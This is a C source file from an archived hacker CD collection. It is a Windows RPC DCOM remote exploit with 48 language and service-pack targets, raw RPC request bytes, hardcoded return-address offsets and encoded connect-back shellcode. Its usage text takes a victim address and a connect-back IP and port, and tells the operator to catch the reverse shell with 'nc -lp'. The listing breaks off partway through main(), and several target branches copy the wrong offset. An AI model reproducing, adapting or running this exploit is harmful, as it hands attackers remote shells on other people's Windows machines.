home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 12 / hacker12 / 12_HACKER_12.ISO / exploits / 0730dcom48 / 07.30.dcom48.c
Encoding:
C/C++ Source or Header  |  2003-08-19  |  20.9 KB  |  482 lines
  1. ///////////////////////////////////////////////////////////////////////
  2. //                                                                   //
  3. //                                                                   // 
  4. //        Windows RPC DCOM Remote Exploit with 48 TARGETS            // 
  5. //                                                                   // 
  6. //                                                                   // 
  7. ///////////////////////////////////////////////////////////////////////
  8. //                                                                   // 
  9. //         English - French - Chinese - Polish - German              //
  10. //             Japanese - Korean - Mexican - Kenyan                  //
  11. //                                                                   //
  12. //      Tks to all wolrd wide contributors (Public Property)         // 
  13. //                                                                   //
  14. //               New Targets ? contrib@k-otik.com                    //
  15. //                                                                   //
  16. ///////////////////////////////////////////////////////////////////////
  17.  
  18.  
  19.  
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <windows.h>
  23. #pragma comment(lib,"ws2_32")
  24.  
  25. #define DWORD unsigned long
  26. WSADATA wsa;
  27.  
  28. unsigned char bindstr[]={
  29. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  30. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  31. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  32. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  33. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  34.  
  35. unsigned char request1[]={
  36. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  37. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  38. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  39. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  40. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  41. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  42. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  43. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  44. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  45. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  46. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  47. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  48. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  49. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  50. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  51. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  52. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  53. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  54. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  55. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  56. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  57. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  58. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  59. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  60. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  61. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  62. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  63. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  65. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  66. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  67. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  68. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  69. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  70. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  72. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  73. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  74. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  75. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  76. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  77. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  78. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  79. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  80. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  82. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  83. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  84. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  85. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  86. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  87. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  88. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  89. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  90. ,0x00,0x00,0x00,0x00,0x00,0x00};
  91.  
  92. unsigned char request2[]={
  93. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  94. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  95.  
  96. unsigned char request3[]={
  97. 0x5C,0x00
  98. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  99. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  100. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  101. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  102.  
  103.  
  104.  
  105. /* Myam add OFFSETS*/
  106.  
  107. char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
  108. char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
  109. char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
  110. char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
  111. char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
  112. char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
  113. char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
  114. char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
  115. char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
  116. char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
  117. char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
  118. char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
  119. char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
  120. char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
  121. char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
  122. char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
  123. char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
  124. char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
  125. char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
  126. char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
  127. char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
  128. char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
  129. char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
  130. char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
  131. char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
  132. char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1  same offset as win2kjp_sp1 ??*/
  133. char win2ksp2kr[] =  "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
  134. char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
  135. char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
  136. char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
  137. char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
  138. char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
  139. char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
  140. char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
  141. char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
  142. char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
  143. char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
  144. char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
  145. char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
  146. char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
  147. char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
  148. char Win2ksp1fr[] = "\x4b\x3e\xe4\x77";  /* French win2k Server SP1 */
  149. char Win2ksp4fr[] = "\x56\xc2\xe2\x77";  /* French win2k Server SP4 */
  150. char winxpsp0fr[] = "\x4a\x75\xd4\x77";  /* French win xp no sp */
  151. char winxpsp1fr[] = "\xfc\x18\xd4\x77";  /* French win xp sp 1 */
  152. char win2ksp3big[] = "\x25\x2b\xaa\x77";
  153. char win2ksp4big[] = "\x29\x4c\xdf\x77";
  154. char winxpsp01big[]  = "\xfb\x7b\xa1\x71";
  155.  
  156.  
  157.  
  158. /* Test this offset
  159. ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
  160. Windows 2000 (no-service-pack) English 0x77e33f6d
  161. 0x77f92a9b
  162. 0x77e2afc5
  163. 0x772254b0 win2k3
  164. 0x77E829E3 / 0x77E83587 kokanin win2k sp3
  165. */    
  166. unsigned char sc[]=
  167.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  168.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  169.     "\x46\x00\x58\x00\x46\x00\x58\x00"
  170.  
  171.     
  172.   "\x29\x4c\xdf\x77" //sp4
  173. //"\x29\x2c\xe2\x77"//0x77e22c29
  174.  
  175.  
  176.     "\x38\x6e\x16\x76\x0d\x6e\x16\x76"  //??????????
  177.         
  178.  
  179.     "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
  180.     "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
  181.     "\x93\x40\xe2\xfa"
  182.     // code 
  183.     "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
  184.     "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
  185.     "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
  186.     "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
  187.     "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
  188.     "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
  189.     "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
  190.     "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
  191.     "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
  192.     "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
  193.     "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
  194.     "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
  195.     "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
  196.     "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
  197.     "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
  198.     "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
  199.     "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
  200.     "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
  201.     "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
  202.     "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
  203.     "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
  204.     "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
  205.     "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
  206.     "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
  207.     "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
  208.     "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
  209.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  210.  
  211. unsigned char request4[]={
  212. 0x01,0x10
  213. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  214. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  215. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  216. };
  217.  
  218. int main(int argc,char ** argv)
  219. {
  220.  
  221. int len, len1, sockfd;
  222.     short port=135;
  223.     struct hostent *he;
  224.     struct sockaddr_in their_addr;
  225.     
  226.  
  227. unsigned char buf1[0x1000];
  228.   unsigned char buf2[0x1000];
  229.   unsigned short port1;
  230.  
  231.  
  232.   DWORD cb;
  233.  
  234.  
  235. WSAStartup(MAKEWORD(2,0),&wsa);
  236.  
  237.  
  238. printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
  239. printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n");
  240.  
  241.  
  242. if(argc<5)
  243. {
  244.  
  245. printf("[<$>] RPC Remote Windows Exploit\n");
  246. printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n");
  247. printf("[<$>] Thanks to b@digitalwaste.org + J°rgen_Haa° + woutiir  \n");
  248. printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
  249. printf("[<$>] On connect back nc -lp cbport\n");
  250. printf("[<$>] Targets: 0 WinNT English +sp4\n");
  251. printf("[<$>]          1 WinNT China +sp5\n");
  252. printf("[<$>]          2 WinNT China +sp6\n");
  253. printf("[<$>]          3 WinNT China +sp6a\n");
  254. printf("[<$>]          4 Win2k Polish nosp ver 5.00.2195\n");
  255. printf("[<$>]          5 Win2k Polish +sp3 ver 5.00.2195\n");
  256. printf("[<$>]          6 Win2k Spanish +sp4\n");
  257. printf("[<$>]          7 Win2k English nosp 1\n");
  258. printf("[<$>]          8 Win2k English nosp 2\n");
  259. printf("[<$>]          9 Win2k English +sp1\n");
  260. printf("[<$>]          10 Win2k English +sp2 1\n");
  261. printf("[<$>]           11 Win2k English +sp2 2\n");
  262. printf("[<$>]          12 Win2k English +sp3 1\n");
  263. printf("[<$>]          13 Win2k English +sp3 2\n");
  264. printf("[<$>]          14 Win2k English +sp4\n");
  265. printf("[<$>]          15 Win2k China nosp\n");
  266. printf("[<$>]          16 Win2k China +sp1\n");
  267. printf("[<$>]          17 Win2k China +sp2\n");
  268. printf("[<$>]          18 Win2k China +sp3\n");
  269. printf("[<$>]          19 Win2k China +sp4\n");
  270. printf("[<$>]          20 Win2k German +sp3\n");
  271. printf("[<$>]          21 Win2k Japanese nosp\n");
  272. printf("[<$>]          22 Win2k Japanese +sp1\n");
  273. printf("[<$>]          23 Win2k Japanese +sp2\n");
  274. printf("[<$>]          24 Win2k Korea nosp\n");
  275. printf("[<$>]          25 Win2k Korea +sp1\n");
  276. printf("[<$>]          26 Win2k Korea +sp2\n");
  277. printf("[<$>]          27 Win2k Mexican nosp\n");
  278. printf("[<$>]          28 Win2k Mexican +sp1\n");
  279. printf("[<$>]          29 Win2k Kenya nosp\n");
  280. printf("[<$>]          30 Win2k Kenya +sp1\n");
  281. printf("[<$>]          31 Win2k Kenya +sp2\n");
  282. printf("[<$>]          32 WinXP English nosp ver 5.1.2600\n");
  283. printf("[<$>]          33 WinXP English +sp1 1\n");
  284. printf("[<$>]          34 WinXP English +sp1 2\n");
  285. printf("[<$>]          35 WinXP English +sp2\n");
  286. printf("[<$>]          36 Win2k3 English nosp\n");
  287. printf("[<$>]          37 Win2k german sp3\n");
  288. printf("[<$>]          38 Win2k german sp4\n");
  289. printf("[<$>]          39 Win2k german sp4 2\n");
  290. printf("[<$>]          40 Winxp german sp1 2\n");
  291. printf("[<$>]          41 Win2k french sp1\n");
  292. printf("[<$>]          42 Win2k french sp4\n");
  293. printf("[<$>]          43 Winxp french sp0\n");
  294. printf("[<$>]          44 Winxp french sp1\n");
  295. printf("[<$>]          45 Win2k big5 sp3\n");
  296. printf("[<$>]          46 Win2k big5 sp4\n");
  297. printf("[<$>]          47 Winxp big5 sp0\n");
  298.  
  299.  
  300. exit(1);
  301. }
  302.  
  303.  
  304. if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
  305.  
  306. perror("gethostbyname");
  307.  
  308. exit(1);
  309.  
  310. }
  311.  
  312. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  313.  
  314. perror("socket");
  315.  
  316. exit(1);
  317.  
  318. }
  319.  
  320.  
  321. their_addr.sin_family = AF_INET;
  322. their_addr.sin_port = htons(port);
  323. their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  324. memset(&(their_addr.sin_zero), '\0', 8);
  325.  
  326.  
  327. if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct 
  328. sockaddr)) == -1) {
  329. printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);
  330.  
  331. exit(1);
  332. }
  333.  
  334.  
  335.  
  336. if(atoi(argv[4])==0)
  337.  
  338. memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng));
  339.  else if (atoi(argv[4])==1)
  340. memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn));
  341.  else if (atoi(argv[4])==2)
  342. memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn));
  343.  else if (atoi(argv[4])==3)
  344. memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn));
  345.  else if (atoi(argv[4])==4)
  346. memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
  347.  else if (atoi(argv[4])==5)
  348. memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
  349.  else if (atoi(argv[4])==6)
  350. memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
  351.  else if (atoi(argv[4])==7)
  352. memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
  353.  else if (atoi(argv[4])==8)
  354. memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
  355.  else if (atoi(argv[4])==9)
  356. memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
  357.  else if (atoi(argv[4])==10)
  358. memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
  359.  else if (atoi(argv[4])==11)
  360. memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
  361.  else if (atoi(argv[4])==12)
  362. memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
  363.  else if (atoi(argv[4])==13)
  364. memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
  365.  else if (atoi(argv[4])==14)
  366. memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
  367.  else if (atoi(argv[4])==15)
  368. memcpy(sc+36,win2knospchi,sizeof(win2knospchi));
  369.  else if (atoi(argv[4])==16)
  370. memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi));
  371.  else if (atoi(argv[4])==17)
  372. memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi));
  373.  else if (atoi(argv[4])==18)
  374. memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
  375.  else if (atoi(argv[4])==19)
  376. memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
  377.  else if (atoi(argv[4])==20)
  378. memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
  379.  else if (atoi(argv[4])==21)
  380. memcpy(sc+36,win2knospjap,sizeof(win2knospjap));
  381.  else if (atoi(argv[4])==22)
  382. memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap));
  383.  else if (atoi(argv[4])==23)
  384. memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
  385.  else if (atoi(argv[4])==24)
  386. memcpy(sc+36,win2knospkr,sizeof(win2knospkr));
  387.  else if (atoi(argv[4])==25)
  388. memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr));
  389.  else if (atoi(argv[4])==26)
  390. memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr));
  391.  else if (atoi(argv[4])==27)
  392. memcpy(sc+36,win2knospmx,sizeof(win2knospmx));
  393.  else if (atoi(argv[4])==28)
  394. memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx));
  395.  else if (atoi(argv[4])==29)
  396. memcpy(sc+36,win2knospken,sizeof(win2knospken));
  397.  else if (atoi(argv[4])==30)
  398. memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken));
  399.  else if (atoi(argv[4])==31)
  400. memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken));
  401.  else if (atoi(argv[4])==32)
  402. memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
  403.  else if (atoi(argv[4])==33)
  404. memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
  405.  else if (atoi(argv[4])==34)
  406. memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
  407.  else if (atoi(argv[4])==35)
  408. memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
  409.  else if (atoi(argv[4])==36)
  410. memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng));
  411.  else if (atoi(argv[4])==37) 
  412. memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger));
  413.  else if (atoi(argv[4])==38) 
  414. memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1));
  415.  else if (atoi(argv[4])==39) 
  416. memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2));
  417.  else if (atoi(argv[4])==40) 
  418. memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger));
  419.  else if (atoi(argv[4])==41)
  420. memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr));
  421.  else if (atoi(argv[4])==42)
  422. memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr));
  423.  else if (atoi(argv[4])==43)
  424. memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr));
  425.  else if (atoi(argv[4])==44)
  426. memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr));
  427.  else if (atoi(argv[4])==45)
  428. memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big));
  429.  else if (atoi(argv[4])==46)
  430. memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big));
  431.  else if (atoi(argv[4])==47)
  432. memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big));
  433.  
  434.  
  435. port1 = htons(atoi(argv[3]));
  436. port1 ^= 0x9393;
